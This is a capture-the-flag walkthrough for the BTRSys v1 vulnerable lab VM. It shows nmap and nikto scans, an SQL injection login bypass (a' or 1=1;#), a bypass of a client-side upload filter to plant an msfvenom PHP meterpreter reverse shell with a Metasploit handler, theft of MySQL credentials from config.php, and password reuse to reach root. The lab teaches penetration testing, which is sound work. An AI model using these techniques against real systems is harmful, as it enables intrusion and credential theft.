BTRSys v1: CTF walkthrough


Name: BTRSys: v1

Date of release: 8 Jun 2017

Author: ismailonderkaya

Series: BTRSys

VM Link:,195/


We can find the IP address of the vulnerable system with arp-scan.


We scan the targeted system with nmap.

[email protected]:~/Desktop# nmap -p- -A -O -T5 --reason

Starting Nmap 7.60 ( ) at 2017-10-15 16:19 CEST
Warning: giving up on port because retransmission cap hit (2).
Nmap scan report for yoda.home (
Host is up, received arp-response (0.012s latency).
Not shown: 65377 closed ports, 155 filtered ports
Reason: 65377 resets and 155 no-responses
21/tcp open  ftp     syn-ack ttl 64 vsftpd 3.0.2
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 600
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|   256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_  256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (EdDSA)
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: BTRisk
MAC Address: 24:0A:64:9E:6E:74 (AzureWave Technology)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

1   12.07 ms yoda.home (

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 244.95 seconds
[email protected]:~/Desktop#

Login Page

Weirdly, gobuster didn’t find the login.php page, so, I used nikto.

[email protected]:~/Desktop# nikto -host
- Nikto v2.1.6
+ Target IP:
+ Target Hostname:
+ Target Port:        80
+ Start Time:         2017-10-15 16:32:11 (GMT2)
+ Server: Apache/2.4.7 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.21
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80 
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7535 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2017-10-15 16:33:38 (GMT2) (87 seconds)
+ 1 host(s) tested

The login.php page is a basic login page but two restrictions need to be bypass.

script type="text/javascript">

function control(){
    var user = document.getElementById("user").value;
    var pwd = document.getElementById("pwd").value;

    var str=user.substring(user.lastIndexOf("@")+1,user.length);

    if((pwd == "'")){
        alert("Hack Denemesi !!!");

    else if (str!=""){
        alert("Yanlis Kullanici Bilgisi Denemektesiniz");



The username need to contain “” string and we can’t use a single quote for the password. All that sound like an HTTP form vulnerable to an SQL injection. After different tries, this one seems to work for me: a’ or 1=1;#

We have access to a file input form, I hope this input is sanitised.

From JPG to Reverse Shell

One more time, this input have only one restriction. We can upload only JPG, GIF or PNG files.

<script type="text/javascript">
        // accept=".jpg,.png"
function getFile(){
    var filename = document.getElementById("dosya").value;
    var sonuc = ((/[.]/.exec(filename)) ? /[^.]+$/.exec(filename) : undefined);
    if((sonuc == "jpg") || (sonuc == "gif") || (sonuc == "png")){
        alert("Yanlizca JPG,PNG dosyalari yukleyebilirsiniz.");
        return false;


The problem with that, is that the security check is done only in the client side. So, if we intercept the sent packet with Burp Suite and if we change the extension of the file for a php file we will be able to upload a php reverse shell.

We generate a php reverse shell called shell.jpg.

[email protected]:~/Desktop# msfvenom -p php/meterpreter/reverse_tcp LPORT=1337 LHOST= -o rshell.jpg
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 964 bytes
Saved as: rshell.jpg
[email protected]:~/Desktop#

We configure our Metasploit handler.

[email protected]:~/Desktop# msfconsole -q
msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 1337
LPORT => 1337
msf exploit(handler) > set LHOST
msf exploit(handler) > run 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 
msf exploit(handler) >

Finally, we configure Burp Suite to intercept the outgoing traffic, we upload the rshell.jpg file and then we change the extension of our reverse shell.

Change file extension

Now, we have a reverse shell.

Reverse shell

Privilege Escalation

First of all, we spawn a new TTY.

meterpreter > shell
Process 3377 created.
Channel 0 created.
python -c 'import pty; pty.spawn("/bin/bash")'
[email protected]:/var/www/html/uploads$ export TERM=linux
export TERM=linux
[email protected]:/var/www/html/uploads$

Then, we will take a look at this interesting file: config.php.

[email protected]:/var/www/html$ cat config.php
cat config.php
if (mysqli_connect_errno())
  echo "Mysql Bağlantı hatası!: " . mysqli_connect_error();

[email protected]:/var/www/html$

Let’s use these MySQL credentials to explore the MySQL database deneme.

[email protected]:/var/www/html$ mysql -uroot -p -Ddeneme
mysql -uroot -p -Ddeneme
Enter password: toor

Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 118197
Server version: 5.5.55-0ubuntu0.14.04.1 (Ubuntu)

Copyright (c) 2000, 2017, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show tables;
show tables;
| Tables_in_deneme |
| user             |
1 row in set (0.00 sec)


Now, we will show the content of this table.

mysql> select * from user;
select * from user;
| ID | Ad_Soyad    | Kullanici_Adi    | Parola    | BabaAdi | BabaMeslegi | AnneAdi | AnneMeslegi | KardesSayisi |
|  1 | ismail kaya | [email protected] | asd123*** | ahmet   | muhasebe    | nazli   | lokantaci   |            5 |
|  2 | can demir   | [email protected] | asd123*** | mahmut  | memur       | gulsah  | tuhafiyeci  |            8 |
2 rows in set (0.00 sec)


Two users with the same password.

mysql> quit
[email protected]:/var/www/html$ su root
su root
Password: asd123***

[email protected]:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:/var/www/html#

We have a root access to this system.

Root shell